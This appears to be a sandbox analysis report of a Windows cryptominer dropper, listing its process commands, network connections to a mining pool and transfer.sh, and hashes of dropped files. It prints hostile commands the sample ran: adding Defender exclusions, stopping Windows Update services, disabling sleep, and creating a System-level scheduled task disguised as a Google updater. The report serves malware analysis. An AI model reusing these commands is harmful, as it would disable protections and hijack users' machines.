"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2588 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2704 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2664 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.70:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 142.250.179.150:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

memory/2792-54-0x0000000000D40000-0x0000000000D74000-memory.dmp

memory/2792-55-0x00000000744A0000-0x0000000074B8E000-memory.dmp

memory/2792-56-0x0000000000350000-0x0000000000356000-memory.dmp

memory/2792-57-0x00000000049F0000-0x0000000004A30000-memory.dmp

memory/2792-58-0x00000000744A0000-0x0000000074B8E000-memory.dmp

memory/2792-59-0x00000000049F0000-0x0000000004A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabD29D.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarD31C.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ef0ef461d3c19198780534b20ea4ec7f
SHA1 2f2bf4b2636b6350278773d54631238968b12347
SHA256 5ccdd91fadae8117a39a139b24ddbfb614b60e2328267aa2c07b2df3fbd00afa
SHA512 17ad28fc73f79bec79dac5dbace5e47e57f98f438e9093a74a95a97e7b04c1ddc411eea0b554dc68d4bda582128d7ac4fda91931f50e7b48b16525ee1835313d

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2792-142-0x000000000C3A0000-0x000000000C62B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1984-145-0x0000000001230000-0x00000000014BB000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2792-153-0x000000000C270000-0x000000000C8A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1668-156-0x0000000000B10000-0x0000000001144000-memory.dmp

memory/1668-162-0x0000000000B10000-0x0000000001144000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/2792-157-0x00000000744A0000-0x0000000074B8E000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/548-164-0x0000000004450000-0x00000000056B5000-memory.dmp

memory/1668-166-0x00000000774D0000-0x00000000774D2000-memory.dmp

memory/1824-165-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/1824-167-0x00000000772E0000-0x0000000077489000-memory.dmp

memory/1824-169-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/1824-170-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/1824-168-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/1824-171-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/1824-172-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/1668-173-0x0000000000150000-0x00000000001C0000-memory.dmp

memory/1976-174-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1976-182-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1668-184-0x0000000002F90000-0x0000000002FD0000-memory.dmp

memory/1668-177-0x0000000074420000-0x0000000074B0E000-memory.dmp

memory/1976-175-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1976-185-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1668-186-0x0000000002FD0000-0x000000000303C000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1976-187-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1668-191-0x0000000000B10000-0x0000000001144000-memory.dmp

memory/1976-192-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1984-188-0x0000000001230000-0x00000000014BB000-memory.dmp

memory/1976-194-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-195-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1824-193-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/1976-196-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1668-198-0x0000000002F90000-0x0000000002FD0000-memory.dmp

memory/1976-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-203-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-209-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/548-208-0x0000000004450000-0x00000000056B5000-memory.dmp

memory/1976-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1668-211-0x0000000002F90000-0x0000000002FD0000-memory.dmp

memory/1976-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1824-220-0x00000000772E0000-0x0000000077489000-memory.dmp

memory/1976-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1824-233-0x000000013F540000-0x00000001407A5000-memory.dmp

memory/944-232-0x000000001B040000-0x000000001B322000-memory.dmp

memory/1976-231-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1668-237-0x0000000005C80000-0x0000000005D32000-memory.dmp

memory/1668-236-0x0000000002F90000-0x0000000002FD0000-memory.dmp

memory/944-235-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/1976-234-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/944-239-0x0000000002370000-0x00000000023F0000-memory.dmp

memory/1976-238-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-240-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-241-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-242-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-243-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-244-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-245-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-246-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-247-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-248-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1976-249-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/944-257-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/944-260-0x000000000237B000-0x00000000023E2000-memory.dmp

memory/944-263-0x0000000002374000-0x0000000002377000-memory.dmp

memory/1976-284-0x00000000774DF000-0x00000000774E0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OK643P7TBQX46GKTH4DC.temp

MD5 ac2d1e65ff284c9c7b8d82b6edde0065
SHA1 666a3e6454edab62fdd3d0d13ce1a1656815ef4f
SHA256 d510686b3faace5e1a6ed3d0564dcea3a3153cc2b3d10db28490f8e3b9f59bae
SHA512 25c3f1714ca3e6c56870f800810d2699d8f13e4d6ae61e944f06dd9037dcf0a348c7c6d23eac20f56d42b5f407086847fee8db9ba8ba293369fdce4aed22fb22

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ac2d1e65ff284c9c7b8d82b6edde0065
SHA1 666a3e6454edab62fdd3d0d13ce1a1656815ef4f
SHA256 d510686b3faace5e1a6ed3d0564dcea3a3153cc2b3d10db28490f8e3b9f59bae
SHA512 25c3f1714ca3e6c56870f800810d2699d8f13e4d6ae61e944f06dd9037dcf0a348c7c6d23eac20f56d42b5f407086847fee8db9ba8ba293369fdce4aed22fb22

memory/2224-294-0x000000001B1B0000-0x000000001B492000-memory.dmp

memory/2224-296-0x0000000001E90000-0x0000000001E98000-memory.dmp

memory/2224-297-0x000007FEF4AC0000-0x000007FEF545D000-memory.dmp

memory/2224-298-0x0000000002810000-0x0000000002890000-memory.dmp

memory/1668-295-0x0000000074420000-0x0000000074B0E000-memory.dmp

memory/2224-299-0x000007FEF4AC0000-0x000007FEF545D000-memory.dmp

memory/2224-301-0x0000000002810000-0x0000000002890000-memory.dmp

memory/2224-304-0x0000000002810000-0x0000000002890000-memory.dmp

memory/1668-303-0x0000000002F90000-0x0000000002FD0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1668-311-0x0000000002F90000-0x0000000002FD0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/2224-337-0x000007FEF4AC0000-0x000007FEF545D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/1824-343-0x00000000772E0000-0x0000000077489000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Local State

MD5 5c2c249a4e5ea5ce4984d5617f290ba5
SHA1 ceecf04d3c9b3dbc8231a4d3acac8b3b3a6bb50d
SHA256 9a19d49f7a4cb4bb237c91550afb45e75defe4131da285b2f3e2d623e99bb28b
SHA512 f7ce2da33b4cddc893ad4fd5fb24b74ff6443b225bbb5327c2dd902cdccbd854b228c46f5092b8121b63877d5b89b0caeaf4be27d1426a8fa88b53a359a8343b

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

memory/1824-346-0x000000013F540000-0x00000001407A5000-memory.dmp

\??\pipe\crashpad_1716_UKMOGYRTYXKVHJLY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Local Storage\leveldb\LOG

MD5 9300901a3c6c754c5df5b4007d263494
SHA1 036389b5041fe7c62662df29e1192205c5242ab8
SHA256 1af8db719655975df8b8f01d6155a7167e9c96a71ba8f9f327454def50edae8f
SHA512 8943581f8560623f29fc9be3417106c805618d06019bb40d8f4bae88b4c8f5ae7623c56bc8ef9b28c7a14e519741d60d2292dca09f6249256611babada2425ee

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Local Storage\leveldb\LOG.old

MD5 a3eab45d8850cd7d3a8811857cc51426
SHA1 73a03c3bb82b4279174c81586fffd64a14294198
SHA256 8307c143a2f2913f200be6410e6d12b997aeeaf18448235e7e3eb1db0e723e23
SHA512 410a61fa03584af80d0ae0455ee7ae047c7231598ca19a83a49b5df89eddbfb6ddda981a43602efddc46da4d1345cf6a0f029f34d859cfe5aa0be23886dbd62e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/1668-373-0x0000000002F90000-0x0000000002FD0000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

\Program Files\Google\Chrome\updater.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/2700-379-0x000000013F850000-0x0000000140AB5000-memory.dmp

